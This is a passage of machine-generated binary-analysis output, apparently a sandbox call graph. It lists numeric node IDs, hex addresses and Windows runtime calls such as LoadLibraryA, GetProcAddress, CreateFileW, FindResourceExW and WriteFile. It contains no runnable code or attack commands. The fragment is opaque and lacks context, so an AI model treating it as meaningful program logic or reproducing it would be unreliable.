101862->102197 101865 724e6a 101864->101865 101866 724e7b FreeLibrary 101864->101866 101865->101548 101866->101865 101868 727e4f 59 API calls 101867->101868 101869 7279fd 101868->101869 101869->101749 101871 723f82 101870->101871 101875 723fa4 _memmove 101870->101875 101873 740db6 Mailbox 59 API calls 101871->101873 101872 740db6 Mailbox 59 API calls 101874 723fb8 101872->101874 101873->101875 101874->101756 101875->101872 101925 724c03 101876->101925 101879 724bdc 101881 724bf5 101879->101881 101882 724bec FreeLibrary 101879->101882 101880 724c03 2 API calls 101880->101879 101883 74525b 101881->101883 101882->101881 101929 745270 101883->101929 101885 724dfc 101885->101764 101885->101765 102089 724c36 101886->102089 101889 724b8f 101891 724ba1 FreeLibrary 101889->101891 101892 724baa 101889->101892 101890 724c36 2 API calls 101890->101889 101891->101892 101893 724c70 101892->101893 101894 740db6 Mailbox 59 API calls 101893->101894 101895 724c85 101894->101895 102093 72522e 101895->102093 101897 724c91 _memmove 101898 724ccc 101897->101898 101900 724dc1 101897->101900 101901 724d89 101897->101901 101899 724ec7 69 API calls 101898->101899 101908 724cd5 101899->101908 102107 78991b 95 API calls 101900->102107 102096 724e89 CreateStreamOnHGlobal 101901->102096 101904 724f0b 74 API calls 101904->101908 101906 724d69 101906->101772 101907 75d8a7 101909 724ee5 85 API calls 101907->101909 101908->101904 101908->101906 101908->101907 102102 724ee5 101908->102102 101910 75d8bb 101909->101910 101911 724f0b 74 API calls 101910->101911 101911->101906 101913 724f1d 101912->101913 101916 75d9cd 101912->101916 102131 7455e2 101913->102131 101917 789109 102151 788f5f 101917->102151 101919 78911f 101919->101780 101921 724ed6 101920->101921 101922 75d990 101920->101922 102156 745c60 101921->102156 101924 724ede 101924->101782 101926 724bd0 101925->101926 101927 724c0c LoadLibraryA 101925->101927 101926->101879 101926->101880 101927->101926 101928 724c1d GetProcAddress 101927->101928 101928->101926 101931 74527c _flsall 101929->101931 101930 74528f 101978 748b28 58 API calls __getptd_noexit 101930->101978 101931->101930 101933 7452c0 101931->101933 101948 7504e8 101933->101948 101934 745294 101979 748db6 9 API calls ___crtsetenv 101934->101979 101937 7452c5 101938 7452ce 101937->101938 101939 7452db 101937->101939 101980 748b28 58 API calls __getptd_noexit 101938->101980 101941 745305 101939->101941 101942 7452e5 101939->101942 101963 750607 101941->101963 101981 748b28 58 API calls __getptd_noexit 101942->101981 101944 74529f _flsall @_EH4_CallFilterFunc@8 101944->101885 101949 7504f4 _flsall 101948->101949 101950 749c0b __lock 58 API calls 101949->101950 101961 750502 101950->101961 101951 75057d 101988 74881d 58 API calls 2 library calls 101951->101988 101954 7505f3 _flsall 101954->101937 101955 750584 101960 750576 101955->101960 101989 749e2b InitializeCriticalSectionAndSpinCount 101955->101989 101957 749c93 __mtinitlocknum 58 API calls 101957->101961 101959 7505aa EnterCriticalSection 101959->101960 101983 7505fe 101960->101983 101961->101951 101961->101957 101961->101960 101986 746c50 59 API calls __lock 101961->101986 101987 746cba LeaveCriticalSection LeaveCriticalSection _doexit 101961->101987 101964 750627 __wopenfile 101963->101964 101965 750641 101964->101965 101977 7507fc 101964->101977 101996 7437cb 60 API calls 2 library calls 101964->101996 101994 748b28 58 API calls __getptd_noexit 101965->101994 101967 750646 101995 748db6 9 API calls ___crtsetenv 101967->101995 101969 75085f 101991 7585a1 101969->101991 101970 745310 101982 745332 LeaveCriticalSection LeaveCriticalSection _fprintf 101970->101982 101973 7507f5 101973->101977 101997 7437cb 60 API calls 2 library calls 101973->101997 101975 750814 101975->101977 101998 7437cb 60 API calls 2 library calls 101975->101998 101977->101965 101977->101969 101978->101934 101979->101944 101980->101944 101981->101944 101982->101944 101990 749d75 LeaveCriticalSection 101983->101990 101985 750605 101985->101954 101986->101961 101987->101961 101988->101955 101989->101959 101990->101985 101999 757d85 101991->101999 101993 7585ba 101993->101970 101994->101967 101995->101970 101996->101973 101997->101975 101998->101977 102000 757d91 _flsall 101999->102000 102001 757da7 102000->102001 102004 757ddd 102000->102004 102086 748b28 58 API calls __getptd_noexit 102001->102086 102003 757dac 102087 748db6 9 API calls ___crtsetenv 102003->102087 102010 757e4e 102004->102010 102007 757df9 102088 757e22 LeaveCriticalSection __unlock_fhandle 102007->102088 102009 757db6 _flsall 102009->101993 102011 757e6e 102010->102011 102012 7444ea __wsopen_nolock 58 API calls 102011->102012 102016 757e8a 102012->102016 102013 757fc1 102014 748dc6 __invoke_watson 8 API calls 102013->102014 102015 7585a0 102014->102015 102017 757d85 __wsopen_helper 103 API calls 102015->102017 102016->102013 102018 757ec4 102016->102018 102029 757ee7 102016->102029 102019 7585ba 102017->102019 102020 748af4 __free_osfhnd 58 API calls 102018->102020 102019->102007 102021 757ec9 102020->102021 102022 748b28 ___crtsetenv 58 API calls 102021->102022 102023 757ed6 102022->102023 102025 748db6 ___crtsetenv 9 API calls 102023->102025 102024 757fa5 102026 748af4 __free_osfhnd 58 API calls 102024->102026 102027 757ee0 102025->102027 102028 757faa 102026->102028 102027->102007 102030 748b28 ___crtsetenv 58 API calls 102028->102030 102029->102024 102033 757f83 102029->102033 102031 757fb7 102030->102031 102032 748db6 ___crtsetenv 9 API calls 102031->102032 102032->102013 102034 74d294 __alloc_osfhnd 61 API calls 102033->102034 102035 758051 102034->102035 102036 75807e 102035->102036 102037 75805b 102035->102037 102038 757cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102036->102038 102039 748af4 __free_osfhnd 58 API calls 102037->102039 102048 7580a0 102038->102048 102040 758060 102039->102040 102042 748b28 ___crtsetenv 58 API calls 102040->102042 102041 75811e GetFileType 102043 758129 GetLastError 102041->102043 102044 75816b 102041->102044 102046 75806a 102042->102046 102047 748b07 __dosmaperr 58 API calls 102043->102047 102056 74d52a __set_osfhnd 59 API calls 102044->102056 102045 7580ec GetLastError 102049 748b07 __dosmaperr 58 API calls 102045->102049 102050 748b28 ___crtsetenv 58 API calls 102046->102050 102051 758150 CloseHandle 102047->102051 102048->102041 102048->102045 102052 757cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102048->102052 102053 758111 102049->102053 102050->102027 102051->102053 102054 75815e 102051->102054 102055 7580e1 102052->102055 102058 748b28 ___crtsetenv 58 API calls 102053->102058 102057 748b28 ___crtsetenv 58 API calls 102054->102057 102055->102041 102055->102045 102061 758189 102056->102061 102059 758163 102057->102059 102058->102013 102059->102053 102060 758344 102060->102013 102064 758517 CloseHandle 102060->102064 102061->102060 102062 7518c1 __lseeki64_nolock 60 API calls 102061->102062 102079 75820a 102061->102079 102063 7581f3 102062->102063 102067 748af4 __free_osfhnd 58 API calls 102063->102067 102083 758212 102063->102083 102065 757cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102064->102065 102066 75853e 102065->102066 102068 758546 GetLastError 102066->102068 102069 7583ce 102066->102069 102067->102079 102070 748b07 __dosmaperr 58 API calls 102068->102070 102069->102013 102072 758552 102070->102072 102071 7518c1 60 API calls __lseeki64_nolock 102071->102083 102075 74d43d __free_osfhnd 59 API calls 102072->102075 102073 750add __close_nolock 61 API calls 102073->102083 102074 750e5b 70 API calls __read_nolock 102074->102083 102075->102069 102076 7597a2 __chsize_nolock 82 API calls 102076->102083 102077 74d886 __write 78 API calls 102077->102079 102078 7518c1 60 API calls __lseeki64_nolock 102078->102079 102079->102060 102079->102077 102079->102078 102079->102083 102080 7583c1 102082 750add __close_nolock 61 API calls 102080->102082 102081 7583aa 102081->102060 102084 7583c8 102082->102084 102083->102071 102083->102073 102083->102074 102083->102076 102083->102079 102083->102080 102083->102081 102085 748b28 ___crtsetenv 58 API calls 102084->102085 102085->102069 102086->102003 102087->102009 102088->102009 102090 724b83 102089->102090 102091 724c3f LoadLibraryA 102089->102091 102090->101889 102090->101890 102091->102090 102092 724c50 GetProcAddress 102091->102092 102092->102090 102094 740db6 Mailbox 59 API calls 102093->102094 102095 725240 102094->102095 102095->101897 102097 724ea3 FindResourceExW 102096->102097 102101 724ec0 102096->102101 102098 75d933 LoadResource 102097->102098 102097->102101 102099 75d948 SizeofResource 102098->102099 102098->102101 102100 75d95c LockResource 102099->102100 102099->102101 102100->102101 102101->101898 102103 724ef4 102102->102103 102104 75d9ab 102102->102104 102108 74584d 102103->102108 102106 724f02 102106->101908 102107->101898 102109 745859 _flsall 102108->102109 102110 74586b 102109->102110 102112 745891 102109->102112 102121 748b28 58 API calls __getptd_noexit 102110->102121 102123 746c11 102112->102123 102113 745870 102122 748db6 9 API calls ___crtsetenv 102113->102122 102115 745897 102129 7457be 83 API calls 5 library calls 102115->102129 102118 7458a6 102130 7458c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102118->102130 102120 74587b _flsall 102120->102106 102121->102113 102122->102120 102124 746c21 102123->102124 102125 746c43 EnterCriticalSection 102123->102125 102124->102125 102126 746c29 102124->102126 102127 746c39 102125->102127 102128 749c0b __lock 58 API calls 102126->102128 102127->102115 102128->102127 102129->102118 102130->102120 102134 7455fd 102131->102134 102133 724f2e 102133->101917 102135 745609 _flsall 102134->102135 102136 74564c 102135->102136 102137 74561f _memset 102135->102137 102138 745644 _flsall 102135->102138 102139 746c11 __lock_file 59 API calls 102136->102139 102147 748b28 58 API calls __getptd_noexit 102137->102147 102138->102133 102141 745652 102139->102141 102149 74541d 72 API calls 6 library calls 102141->102149 102142 745639 102148 748db6 9 API calls ___crtsetenv 102142->102148 102145 745668 102150 745686 LeaveCriticalSection LeaveCriticalSection _fprintf 102145->102150 102147->102142 102148->102138 102149->102145 102150->102138 102154 74520a GetSystemTimeAsFileTime 102151->102154 102153 788f6e 102153->101919 102155 745238 __aulldiv 102154->102155 102155->102153 102157 745c6c _flsall 102156->102157 102158 745c93 102157->102158 102159 745c7e 102157->102159 102161 746c11 __lock_file 59 API calls 102158->102161 102170 748b28 58 API calls __getptd_noexit 102159->102170 102163 745c99 102161->102163 102162 745c83 102171 748db6 9 API calls ___crtsetenv 102162->102171 102172 7458d0 67 API calls 6 library calls 102163->102172 102166 745ca4 102173 745cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102166->102173 102167 745c8e _flsall 102167->101924 102169 745cb6 102169->102167 102170->102162 102171->102167 102172->102166 102173->102169 102174->101788 102175->101802 102176->101804 102177->101800 102178->101810 102180 729169 Mailbox 102179->102180 102181 75f19f 102180->102181 102186 729173 102180->102186 102182 740db6 Mailbox 59 API calls 102181->102182 102184 75f1ab 102182->102184 102183 72917a 102183->101814 102186->102183 102187 729c90 59 API calls Mailbox 102186->102187 102187->102186 102188->101825 102189->101820 102195 789748 __tzset_nolock _wcscmp 102190->102195 102191 7895dc 102191->101831 102191->101858 102192 724f0b 74 API calls 102192->102195 102193 789109 GetSystemTimeAsFileTime 102193->102195 102194 724ee5 85 API calls 102194->102195 102195->102191 102195->102192 102195->102193 102195->102194 102196->101857 102198 7453b2 _flsall 102197->102198 102199 7453c6 102198->102199 102200 7453de 102198->102200 102226 748b28 58 API calls __getptd_noexit 102199->102226 102203 746c11 __lock_file 59 API calls 102200->102203 102207 7453d6 _flsall 102200->102207 102202 7453cb 102227 748db6 9 API calls ___crtsetenv 102202->102227 102205 7453f0 102203->102205 102210 74533a 102205->102210 102207->101864 102211 74535d 102210->102211 102212 745349 102210->102212 102214 745359 102211->102214 102229 744a3d 102211->102229 102272 748b28 58 API calls __getptd_noexit 102212->102272 102228 745415 LeaveCriticalSection LeaveCriticalSection _fprintf 102214->102228 102215 74534e 102273 748db6 9 API calls ___crtsetenv 102215->102273 102222 745377 102246 750a02 102222->102246 102224 74537d 102224->102214 102225 742d55 _free 58 API calls 102224->102225 102225->102214 102226->102202 102227->102207 102228->102207 102230 744a50 102229->102230 102234 744a74 102229->102234 102231 7446e6 __stbuf 58 API calls 102230->102231 102230->102234 102232 744a6d 102231->102232 102274 74d886 102232->102274 102235 750b77 102234->102235 102236 750b84 102235->102236 102238 745371 102235->102238 102237 742d55 _free 58 API calls 102236->102237 102236->102238 102237->102238 102239 7446e6 102238->102239 102240 744705 102239->102240 102241 7446f0 102239->102241 102240->102222 102409 748b28 58 API calls __getptd_noexit 102241->102409 102243 7446f5 102410 748db6 9 API calls ___crtsetenv 102243->102410 102245 744700 102245->102222 102247 750a0e _flsall 102246->102247 102248 750a32 102247->102248 102249 750a1b 102247->102249 102251 750abd 102248->102251 102252 750a42 102248->102252 102426 748af4 58 API calls __getptd_noexit 102249->102426 102431 748af4 58 API calls __getptd_noexit 102251->102431 102255 750a60 102252->102255 102256 750a6a 102252->102256 102254 750a20 102427 748b28 58 API calls __getptd_noexit 102254->102427 102428 748af4 58 API calls __getptd_noexit 102255->102428 102260 74d206 ___lock_fhandle 59 API calls 102256->102260 102259 750a65 102432 748b28 58 API calls __getptd_noexit 102259->102432 102262 750a70 102260->102262 102264 750a83 102262->102264 102265 750a8e 102262->102265 102263 750ac9 102433 748db6 9 API calls ___crtsetenv 102263->102433 102411 750add 102264->102411 102429 748b28 58 API calls __getptd_noexit 102265->102429 102268 750a27 _flsall 102268->102224 102270 750a89 102430 750ab5 LeaveCriticalSection __unlock_fhandle 102270->102430 102272->102215 102273->102214 102275 74d892 _flsall 102274->102275 102276 74d8b6 102275->102276 102277 74d89f 102275->102277 102279 74d955 102276->102279 102282 74d8ca 102276->102282 102375 748af4 58 API calls __getptd_noexit 102277->102375 102381 748af4 58 API calls __getptd_noexit 102279->102381 102281 74d8a4 102376 748b28 58 API calls __getptd_noexit 102281->102376 102285 74d8f2 102282->102285 102286 74d8e8 102282->102286 102283 74d8ed 102382 748b28 58 API calls __getptd_noexit 102283->102382 102302 74d206 102285->102302 102377 748af4 58 API calls __getptd_noexit 102286->102377 102290 74d8f8 102292 74d91e 102290->102292 102293 74d90b 102290->102293 102291 74d961 102383 748db6 9 API calls ___crtsetenv 102291->102383 102378 748b28 58 API calls __getptd_noexit 102292->102378 102311 74d975 102293->102311 102297 74d8ab _flsall 102297->102234 102298 74d917 102380 74d94d LeaveCriticalSection __unlock_fhandle 102298->102380 102299 74d923 102379 748af4 58 API calls __getptd_noexit 102299->102379 102303 74d212 _flsall 102302->102303 102304 74d261 EnterCriticalSection 102303->102304 102306 749c0b __lock 58 API calls 102303->102306 102305 74d287 _flsall 102304->102305 102305->102290 102307 74d237 102306->102307 102308 74d24f 102307->102308 102384 749e2b InitializeCriticalSectionAndSpinCount 102307->102384 102385 74d28b LeaveCriticalSection _doexit 102308->102385 102312 74d982 __ftell_nolock 102311->102312 102313 74d9e0 102312->102313 102314 74d9c1 102312->102314 102342 74d9b6 102312->102342 102318 74da38 102313->102318 102319 74da1c 102313->102319 102395 748af4 58 API calls __getptd_noexit 102314->102395 102316 74c5f6 __call_reportfault 6 API calls 102320 74e1d6 102316->102320 102317 74d9c6 102396 748b28 58 API calls __getptd_noexit 102317->102396 102322 74da51 102318->102322 102401 7518c1 60 API calls 3 library calls 102318->102401 102398 748af4 58 API calls __getptd_noexit 102319->102398 102320->102298 102386 755c6b 102322->102386 102324 74d9cd 102397 748db6 9 API calls ___crtsetenv 102324->102397 102327 74da21 102399 748b28 58 API calls __getptd_noexit 102327->102399 102329 74da5f 102331 74ddb8 102329->102331 102402 7499ac 58 API calls 2 library calls 102329->102402 102333 74ddd6 102331->102333 102334 74e14b WriteFile 102331->102334 102332 74da28 102400 748db6 9 API calls ___crtsetenv 102332->102400 102337 74defa 102333->102337 102346 74ddec 102333->102346 102338 74ddab GetLastError 102334->102338 102344 74dd78 102334->102344 102348 74df05 102337->102348 102352 74dfef 102337->102352 102338->102344 102339 74da8b GetConsoleMode 102339->102331 102341 74daca 102339->102341 102340 74e184 102340->102342 102407 748b28 58 API calls __getptd_noexit 102340->102407 102341->102331 102345 74dada GetConsoleCP 102341->102345 102342->102316 102344->102340 102344->102342 102351 74ded8 102344->102351 102345->102340 102361 74db09 102345->102361 102346->102340 102347 74de5b WriteFile 102346->102347 102347->102338 102349 74de98 102347->102349 102348->102340 102353 74df6a WriteFile 102348->102353 102349->102346 102369 74debc 102349->102369 102350 74e1b2 102408 748af4 58 API calls __getptd_noexit 102350->102408 102355 74dee3 102351->102355 102356 74e17b 102351->102356 102352->102340 102357 74e064 WideCharToMultiByte 102352->102357 102353->102338 102358 74dfb9 102353->102358 102404 748b28 58 API calls __getptd_noexit 102355->102404 102406 748b07 58 API calls 3 library calls 102356->102406 102357->102338 102368 74e0ab 102357->102368 102358->102344 102358->102348 102358->102369 102361->102344 102367 7562ba 60 API calls __write_nolock 102361->102367 102370 74dbf2 WideCharToMultiByte 102361->102370 102373 74dc5f 102361->102373 102403 7435f5 58 API calls __isleadbyte_l 102361->102403 102362 74e0b3 WriteFile 102365 74e106 GetLastError 102362->102365 102362->102368 102363 74dee8 102405 748af4 58 API calls __getptd_noexit 102363->102405 102365->102368 102367->102361 102368->102344 102368->102352 102368->102362 102368->102369 102369->102344 102370->102344 102371 74dc2d WriteFile 102370->102371 102371->102338 102371->102373 102372 757a5e WriteConsoleW CreateFileW __putwch_nolock 102372->102373 102373->102338 102373->102344 102373->102361 102373->102372 102374 74dc87 WriteFile 102373->102374 102374->102338 102374->102373 102375->102281 102376->102297 102377->102283 102378->102299 102379->102298 102380->102297 102381->102283 102382->102291 102383->102297 102384->102308 102385->102304 102387 755c76 102386->102387 102388 755c83 102386->102388 102389 748b28 ___crtsetenv 58 API calls 102387->102389 102390 748b28 ___crtsetenv 58 API calls 102388->102390 102391 755c8f 102388->102391 102393 755c7b 102389->102393 102392 755cb0 102390->102392 102391->102329 102394 748db6 ___crtsetenv 9 API calls 102392->102394 102393->102329 102394->102393 102395->102317 102396->102324 102397->102342 102398->102327 102399->102332 102400->102342 102401->102322 102402->102339 102403->102361 102404->102363 102405->102342 102406->102342 102407->102350 102408->102342 102409->102243 102410->102245 102434 74d4c3 102411->102434 102413 750b41 102447 74d43d 59 API calls 2 library calls 102413->102447 102415 750aeb 102415->102413 102416 750b1f 102415->102416 102419 74d4c3 __lseeki64_nolock 58 API calls 102415->102419 102416->102413 102417 74d4c3 __lseeki64_nolock 58 API calls 102416->102417 102420 750b2b CloseHandle 102417->102420 102418 750b49 102421 750b6b 102418->102421 102448 748b07 58 API calls 3 library calls 102418->102448 102422 750b16 102419->102422 102420->102413 102423 750b37 GetLastError 102420->102423 102421->102270 102425 74d4c3 __lseeki64_nolock 58 API calls 102422->102425 102423->102413 102425->102416 102426->102254 102427->102268 102428->102259 102429->102270 102430->102268 102431->102259 102432->102263 102433->102268 102435 74d4e3 102434->102435 102436 74d4ce 102434->102436 102440 74d508 102435->102440 102451 748af4 58 API calls __getptd_noexit 102435->102451 102449 748af4 58 API calls __getptd_noexit 102436->102449 102439 74d4d3 102450 748b28 58 API calls __getptd_noexit 102439->102450 102440->102415 102441 74d512 102452 748b28 58 API calls __getptd_noexit 102441->102452 102444 74d4db 102444->102415 102445 74d51a 102453 748db6 9 API calls ___crtsetenv 102445->102453 102447->102418 102448->102421 102449->102439 102450->102444 102451->102441 102452->102445 102453->102444 102516 751940 102454->102516 102457 724799 102522 727d8c 102457->102522 102458 72477c 102459 727bcc 59 API calls 102458->102459 102461 724788 102459->102461 102518 727726 102461->102518 102464 740791 102465 74079e __ftell_nolock 102464->102465 102466 74079f GetLongPathNameW 102465->102466 102467 727bcc 59 API calls 102466->102467 102468 7272bd 102467->102468 102469 72700b 102468->102469 102470 727667 59 API calls 102469->102470 102471 72701d 102470->102471 102472 724750 60 API calls 102471->102472 102473 727028 102472->102473 102474 727033 102473->102474 102478 75e885 102473->102478 102475 723f74 59 API calls 102474->102475 102477 72703f 102475->102477 102526 7234c2 102477->102526 102480 75e89f 102478->102480 102532 727908 61 API calls 102478->102532 102481 727052 Mailbox 102481->101627 102483 724ddd 136 API calls 102482->102483 102484 72688f 102483->102484 102485 75e031 102484->102485 102486 724ddd 136 API calls 102484->102486 102487 78955b 122 API calls 102485->102487 102488 7268a3 102486->102488 102489 75e046 102487->102489 102488->102485 102490 7268ab 102488->102490 102491 75e067 102489->102491 102492 75e04a 102489->102492 102494 7268b7 102490->102494 102495 75e052 102490->102495 102493 740db6 Mailbox 59 API calls 102491->102493 102496 724e4a 84 API calls 102492->102496 102505 75e0ac Mailbox 102493->102505 102533 726a8c 102494->102533 102639 7842f8 90 API calls _wprintf 102495->102639 102496->102495 102500 75e060 102500->102491 102501 75e260 102502 742d55 _free 58 API calls 102501->102502 102503 75e268 102502->102503 102504 724e4a 84 API calls 102503->102504 102509 75e271 102504->102509 102505->102501 102505->102509 102513 727de1 59 API calls 102505->102513 102625 72750f 102505->102625 102633 72735d 102505->102633 102640 77f73d 59 API calls 2 library calls 102505->102640 102641 77f65e 61 API calls 2 library calls 102505->102641 102642 78737f 59 API calls Mailbox 102505->102642 102510 742d55 _free 58 API calls 102509->102510 102511 724e4a 84 API calls 102509->102511 102643 77f7a1 89 API calls 4 library calls 102509->102643 102510->102509 102511->102509 102513->102505 102517 72475d GetFullPathNameW 102516->102517 102517->102457 102517->102458 102519 727734 102518->102519 102520 727d2c 59 API calls 102519->102520 102521 724794 102520->102521 102521->102464 102523 727da6 102522->102523 102524 727d99 102522->102524 102525 740db6 Mailbox 59 API calls 102523->102525 102524->102461 102525->102524 102527 7234d4 102526->102527 102531 7234f3 _memmove 102526->102531 102529 740db6 Mailbox 59 API calls 102527->102529 102528 740db6 Mailbox 59 API calls 102530 72350a 102528->102530 102529->102531 102530->102481 102531->102528 102532->102478 102534 726ab5 102533->102534 102535 75e41e 102533->102535 102649 7257a6 60 API calls Mailbox 102534->102649 102716 77f7a1 89 API calls 4 library calls 102535->102716 102538 75e431 102717 77f7a1 89 API calls 4 library calls 102538->102717 102539 726ad7 102650 7257f6 67 API calls 102539->102650 102541 726aec 102541->102538 102543 726af4 102541->102543 102545 727667 59 API calls 102543->102545 102544 75e44d 102548 726b61 102544->102548 102546 726b00 102545->102546 102651 740957 60 API calls __ftell_nolock 102546->102651 102550 75e460 102548->102550 102551 726b6f 102548->102551 102549 726b0c 102552 727667 59 API calls 102549->102552 102553 725c6f CloseHandle 102550->102553 102554 727667 59 API calls 102551->102554 102555 726b18 102552->102555 102556 75e46c 102553->102556 102557 726b78 102554->102557 102558 724750 60 API calls 102555->102558 102559 724ddd 136 API calls 102556->102559 102560 727667 59 API calls 102557->102560 102561 726b26 102558->102561 102562 75e488 102559->102562 102563 726b81 102560->102563 102652 725850 ReadFile SetFilePointerEx 102561->102652 102565 75e4b1 102562->102565 102570 78955b 122 API calls 102562->102570 102654 72459b 102563->102654 102718 77f7a1 89 API calls 4 library calls 102565->102718 102567 726b98 102571 727b2e 59 API calls 102567->102571 102569 726b52 102653 725aee SetFilePointerEx SetFilePointerEx 102569->102653 102573 75e4a4 102570->102573 102574 726ba9 SetCurrentDirectoryW 102571->102574 102575 75e4cd 102573->102575 102576 75e4ac 102573->102576 102582 726bbc Mailbox 102574->102582 102578 724e4a 84 API calls 102575->102578 102577 724e4a 84 API calls 102576->102577 102577->102565 102580 75e4d2 102578->102580 102579 726d0c Mailbox 102644 7257d4 102579->102644 102581 740db6 Mailbox 59 API calls 102580->102581 102588 75e506 102581->102588 102584 740db6 Mailbox 59 API calls 102582->102584 102586 726bcf 102584->102586 102585 723bbb 102585->101481 102585->101489 102587 72522e 59 API calls 102586->102587 102589 726bda Mailbox __NMSG_WRITE 102587->102589 102590 72750f 59 API calls 102588->102590 102591 726ce7 102589->102591 102602 75e7d9 102589->102602 102609 75e7d1 102589->102609 102612 727de1 59 API calls 102589->102612 102705 72586d 67 API calls _wcscpy 102589->102705 102706 726f5d GetStringTypeW 102589->102706 102707 726ecc 60 API calls __wcsnicmp 102589->102707 102708 726faa GetStringTypeW __NMSG_WRITE 102589->102708 102709 74363d GetStringTypeW _iswctype 102589->102709 102710 7268dc 165 API calls 3 library calls 102589->102710 102711 727213 59 API calls Mailbox 102589->102711 102620 75e54f Mailbox 102590->102620 102712 725c6f 102591->102712 102592 75e740 102723 7872df 59 API calls Mailbox 102592->102723 102595 726cf3 SetCurrentDirectoryW 102595->102579 102598 75e762 102724 79fbce 59 API calls 2 library calls 102598->102724 102601 75e76f 102603 742d55 _free 58 API calls 102601->102603 102727 77f7a1 89 API calls 4 library calls 102602->102727 102603->102579 102606 72750f 59 API calls 102606->102620 102607 75e7f2 102607->102591 102726 77f5f7 59 API calls 4 library calls 102609->102726 102612->102589 102615 727de1 59 API calls 102615->102620 102619 75e792 102725 77f7a1 89 API calls 4 library calls 102619->102725 102620->102592 102620->102606 102620->102615 102620->102619 102719 77f73d 59 API calls 2 library calls 102620->102719 102720 77f65e 61 API calls 2 library calls 102620->102720 102721 78737f 59 API calls Mailbox 102620->102721 102722 727213 59 API calls Mailbox 102620->102722 102622 75e7ab 102623 742d55 _free 58 API calls 102622->102623 102624 75e4c8 102623->102624 102624->102579 102626 727522 _memmove 102625->102626 102627 7275af 102625->102627 102628 740db6 Mailbox 59 API calls 102626->102628 102629 740db6 Mailbox 59 API calls 102627->102629 102631 727529 102628->102631 102629->102626 102630 727552 102630->102505 102631->102630 102632 740db6 Mailbox 59 API calls 102631->102632 102632->102630 102634 727370 102633->102634 102637 72741e 102633->102637 102635 740db6 Mailbox 59 API calls 102634->102635 102638 7273a2 102634->102638 102635->102638 102636 740db6 59 API calls Mailbox 102636->102638 102637->102505 102638->102636 102638->102637 102639->102500 102640->102505 102641->102505 102642->102505 102643->102509 102645 725c6f CloseHandle 102644->102645 102646 7257dc Mailbox 102645->102646 102647 725c6f CloseHandle 102646->102647 102648 7257eb 102647->102648 102648->102585 102649->102539 102650->102541 102651->102549 102652->102569 102653->102548 102655 727667 59 API calls 102654->102655 102656 7245b1 102655->102656 102657 727667 59 API calls 102656->102657 102658 7245b9 102657->102658 102659 727667 59 API calls 102658->102659 102660 7245c1 102659->102660 102661 727667 59 API calls 102660->102661 102662 7245c9 102661->102662 102663 75d4d2 102662->102663 102664 7245fd 102662->102664 102665 728047 59 API calls 102663->102665 102666 72784b 59 API calls 102664->102666 102667 75d4db 102665->102667 102668 72460b 102666->102668 102669 727d8c 59 API calls 102667->102669 102670 727d2c 59 API calls 102668->102670 102672 724640 102669->102672 102671 724615 102670->102671 102671->102672 102673 72784b 59 API calls 102671->102673 102674 724680 102672->102674 102676 72465f 102672->102676 102687 75d4fb 102672->102687 102677 724636 102673->102677 102728 72784b 102674->102728 102681 7279f2 59 API calls 102676->102681 102680 727d2c 59 API calls 102677->102680 102678 724691 102682 7246a3 102678->102682 102685 728047 59 API calls 102678->102685 102679 75d5cb 102683 727bcc 59 API calls 102679->102683 102680->102672 102684 724669 102681->102684 102686 7246b3 102682->102686 102689 728047 59 API calls 102682->102689 102700 75d588 102683->102700 102684->102674 102688 72784b 59 API calls 102684->102688 102685->102682 102691 7246ba 102686->102691 102692 728047 59 API calls 102686->102692 102687->102679 102690 75d5b4 102687->102690 102699 75d532 102687->102699 102688->102674 102689->102686 102690->102679 102695 75d59f 102690->102695 102693 728047 59 API calls 102691->102693 102702 7246c1 Mailbox 102691->102702 102692->102691 102693->102702 102694 7279f2 59 API calls 102694->102700 102697 727bcc 59 API calls 102695->102697 102696 75d590 102698 727bcc 59 API calls 102696->102698 102697->102700 102698->102700 102699->102696 102703 75d57b 102699->102703 102700->102674 102700->102694 102741 727924 59 API calls 2 library calls 102700->102741 102702->102567 102704 727bcc 59 API calls 102703->102704 102704->102700 102705->102589 102706->102589 102707->102589 102708->102589 102709->102589 102710->102589 102711->102589 102713 725c88 102712->102713 102714 725c79 102712->102714 102713->102714 102715 725c8d CloseHandle 102713->102715 102714->102595 102715->102714 102716->102538 102717->102544 102718->102624 102719->102620 102720->102620 102721->102620 102722->102620 102723->102598 102724->102601 102725->102622 102726->102602 102727->102607 102729 7278b7 102728->102729 102730 72785a 102728->102730 102731 727d2c 59 API calls 102729->102731 102730->102729 102732 727865 102730->102732 102738 727888 _memmove 102731->102738 102733 727880 102732->102733 102734 75eb09 102732->102734 102742 727f27 59 API calls Mailbox 102733->102742 102735 728029 59 API calls 102734->102735 102737 75eb13 102735->102737 102739 740db6 Mailbox 59 API calls 102737->102739 102738->102678 102740 75eb33 102739->102740 102741->102700 102742->102738 102744 726d95 102743->102744 102749 726ea9 102743->102749 102745 740db6 Mailbox 59 API calls 102744->102745 102744->102749 102747 726dbc 102745->102747 102746 740db6 Mailbox 59 API calls 102753 726e31 102746->102753 102747->102746 102749->101633 102751 72735d 59 API calls 102751->102753 102752 72750f 59 API calls 102752->102753 102753->102749 102753->102751 102753->102752 102756 726240 94 API calls 2 library calls 102753->102756 102757 776553 59 API calls Mailbox 102753->102757 102754->101635 102755->101637 102756->102753 102757->102753 102758->101651 102759->101652 102761 72e6d5 102760->102761 102762 763aa9 102761->102762 102765 72e73f 102761->102765 102774 72e799 102761->102774 102850 729ea0 102762->102850 102764 763abe 102790 72e970 Mailbox 102764->102790 102874 789e4a 89 API calls 4 library calls 102764->102874 102768 727667 59 API calls 102765->102768 102765->102774 102766 727667 59 API calls 102766->102774 102770 763b04 102768->102770 102769 742d40 __cinit 67 API calls 102769->102774 102772 742d40 __cinit 67 API calls 102770->102772 102771 763b26 102771->101722 102772->102774 102773 7284c0 69 API calls 102773->102790 102774->102766 102774->102769 102774->102771 102775 72e95a 102774->102775 102774->102790 102775->102790 102875 789e4a 89 API calls 4 library calls 102775->102875 102777 729ea0 341 API calls 102777->102790 102778 728d40 59 API calls 102778->102790 102783 789e4a 89 API calls 102783->102790 102786 72f195 102879 789e4a 89 API calls 4 library calls 102786->102879 102788 763e25 102788->101722 102789 72ea78 102789->101722 102790->102773 102790->102777 102790->102778 102790->102783 102790->102786 102790->102789 102849 727f77 59 API calls 2 library calls 102790->102849 102876 776e8f 59 API calls 102790->102876 102877 79c5c3 341 API calls 102790->102877 102878 79b53c 341 API calls Mailbox 102790->102878 102880 